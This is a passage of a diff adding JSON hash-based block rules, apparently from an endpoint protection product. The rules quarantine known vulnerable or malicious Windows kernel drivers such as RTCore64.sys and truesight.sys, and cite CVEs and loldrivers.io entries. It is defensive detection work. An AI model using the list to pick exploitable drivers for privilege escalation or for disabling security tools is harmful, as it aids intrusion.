+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974108Z",
+ "creation_date": "2026-03-23T11:45:29.974110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecd07df7ad6fee9269a9e9429eb199bf3e24cf672aa1d013b7e8d90d75324566",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ed85ee6-98ce-5007-9860-0154fe9eb079",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819498Z",
+ "creation_date": "2026-03-23T11:45:30.819500Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3cb111fdedc32f2f253aacde4372b710035c8652eb3586553652477a521c9284",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ee8010b-fc28-55d5-a9f8-aaaf94cdc63a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452708Z",
+ "creation_date": "2026-03-23T11:45:30.452712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bf4cced4209c73aa37a9e2bf9ff27d458d8d7201eefa6f6ad4849ee276ad158",
+ "comment": "Vulnerable Kernel Driver (aka fiddrv64.sys) [https://www.loldrivers.io/drivers/64f3d4b0-6d2b-4275-b3d4-15d092af4092/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8eeb1a20-0b06-589e-9cbf-a3c417ce9606",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981700Z",
+ "creation_date": "2026-03-23T11:45:29.981704Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b205838a8271daea89656b1ec7c5bb7244c42a8b8000d7697e92095da6b9b94",
+ "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8eec39d2-f7a3-50d7-9b99-d65f67de243a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622759Z",
+ "creation_date": "2026-03-23T11:45:29.622761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a520ff5c754a1fb62ba88399a313d0c0fb99145ba2d3d91dbf4282388b77fa84",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ef5479c-0d31-5922-8c12-5a25ca1fb5ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828365Z",
+ "creation_date": "2026-03-23T11:45:30.828367Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828372Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "164e53bcd4af4a0cf7773f7570f43a8370521e3fba8e7da76fe6e46d93c54375",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8efc4026-0508-5aba-880e-6f6a6a92e56c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490419Z",
+ "creation_date": "2026-03-23T11:45:31.490421Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fed4296d2bd088e45850ef09c5f1f598b926a3602dab71e921e8a881af2dfb39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8eff5a5f-b3c8-588f-a808-fbb2ba6cfd6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455730Z",
+ "creation_date": "2026-03-23T11:45:30.455734Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6701433861742c08eb50f1e785962378143ad5b6c374ac29118168599f8a0f1c",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f0437d6-ffb1-5479-b7d3-b2423efd37ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145659Z",
+ "creation_date": "2026-03-23T11:45:32.145661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "930da474a6d1be97b54f2c81e883e14d62897aa58622e5b040e412bd36cee0a7",
+ "comment": "Malicious Kernel Driver (aka driver_930da474.sys) [https://www.loldrivers.io/drivers/4c4e7664-af86-4483-858a-f59346f3d304/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f098271-1543-5b6a-a9bf-00949da16756",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818208Z",
+ "creation_date": "2026-03-23T11:45:30.818210Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818215Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb59a641adb623a65a9b5af1db2ffd921fd1ca1bc046a6df85d5f2e00fd0b5a5",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f0a1565-5a6a-556d-8cb8-03d08d57f17f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160720Z",
+ "creation_date": "2026-03-23T11:45:31.160722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee73362a7b874688da240e0c26e85b9f94ff012708f57fdedaee8d81b015baba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f0c8bbe-2a1e-5a2e-93c4-8f510fd52491",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455052Z",
+ "creation_date": "2026-03-23T11:45:30.455055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40c45c9b1c764777096b59f99ae524cbd25b88c805187e615c3ed6840f3d4c15",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f172986-bb69-5d6a-934d-6c35d5d798c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460264Z",
+ "creation_date": "2026-03-23T11:45:30.460268Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460277Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ab48bf8c099611b217cc9f78af2f92e9aaeedf1cea4c95d5dd562f51e9f0d09",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f1c5ec8-cc49-5fe3-b6fd-568f18f93780",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140418Z",
+ "creation_date": "2026-03-23T11:45:31.140420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a56f9efee818f2d92cbcaa4025d4a40ec1a32243226c3df5f6db8fb6be769e4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f1e87c1-621f-5148-9adc-ad850f97e833",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821470Z",
+ "creation_date": "2026-03-23T11:45:30.821474Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "767ef5c831f92d92f2bfc3e6ea7fd76d11999eeea24cb464fd62e73132ed564b",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f218bde-cd11-5551-bcd3-3ba5b37d7d07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144481Z",
+ "creation_date": "2026-03-23T11:45:31.144483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "885c386e3349ab5feb9c8f53eb9d72c6cc0e34e7decb1cc67ca60d4ed55aff9f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f24dfd0-32a7-58d2-8904-3a01a495c6c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482979Z",
+ "creation_date": "2026-03-23T11:45:31.482983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23acb0b9873f8b4bfdd2ad9583a32d42bbd8ffa9ffa63ee6c56d2f2c36822caa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f2a7991-19dd-5588-b793-decfa50b507c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159104Z",
+ "creation_date": "2026-03-23T11:45:31.159106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159111Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebd5013c06979f4b14956b2b912d821a1afc2e78eb22e8e1f303f26c3afe6168",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f2b33ae-861a-5e42-87ea-ae3c5dd272de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483629Z",
+ "creation_date": "2026-03-23T11:45:31.483633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483642Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f2439b26ab2a365ae0014bbc008f78d9f1bb8772661de5600d21b61d9beffd4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f2ead5c-ee58-579a-a96e-8a638e52ad4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982159Z",
+ "creation_date": "2026-03-23T11:45:29.982161Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "acb65f96f1d5c986b52d980a1c5ea009292ff472087fdd8a98a485404948f585",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f367a89-bb24-5471-aea6-0f915052d013",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482916Z",
+ "creation_date": "2026-03-23T11:45:31.482920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85620e543732b4d53062cdbf61d924ac29accbf7e6ea663fc39fd0c9a12900d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f3ac8a8-317d-535f-920e-dadf8135e37f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830492Z",
+ "creation_date": "2026-03-23T11:45:30.830495Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0019c165b4c461fcdd455c6d78ab0ac4a28b7b57f6dff09d42d8f334e8b6c4bd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f4209b4-0d0a-5225-86cc-ca67dc6022dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979012Z",
+ "creation_date": "2026-03-23T11:45:29.979014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979019Z",
+ "rule_level": null,
+ "rule_level_override": null,
